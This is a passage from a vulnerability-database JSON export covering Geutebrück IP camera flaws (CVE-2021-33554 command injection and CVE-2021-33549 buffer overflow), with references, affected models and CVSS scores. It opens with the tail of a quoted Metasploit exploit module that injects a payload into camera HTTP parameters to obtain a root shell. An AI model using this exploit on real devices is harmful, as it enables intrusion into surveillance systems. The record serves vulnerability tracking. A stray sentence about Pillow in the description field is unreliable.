response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33554"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33554"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33554",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2021090031",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2084",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33554",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33554"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2084"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33554"
}
]
},
"id": "VAR-202109-0850",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:43:15.595000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158064"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2084"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33554"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.6,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021090031"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33554"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2084"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33554"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33554"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2084"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33554"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2084"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-13T18:15:23.730000",
"db": "NVD",
"id": "CVE-2021-33554"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2084"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2023-11-07T03:35:52.423000",
"db": "NVD",
"id": "CVE-2021-33554"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2084"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2084"
}
],
"trust": 0.6
}
}
VAR-202109-0858
Vulnerability from variot - Updated: 2025-01-30 20:43Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0858",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33549"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2088"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33549",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33549",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33549",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33549",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33549",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2088",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-33549",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-33549"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2088"
},
{
"db": "NVD",
"id": "CVE-2021-33549"
},
{
"db": "NVD",
"id": "CVE-2021-33549"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33549"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33549"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33549",
"trust": 2.6
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164191",
"trust": 1.7
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2088",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33549",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33549"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2088"
},
{
"db": "NVD",
"id": "CVE-2021-33549"
}
]
},
"id": "VAR-202109-0858",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:43:04.157000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Multiple Geutebr\u00fcck Repair measures for the error and vulnerability of the camera device buffer",
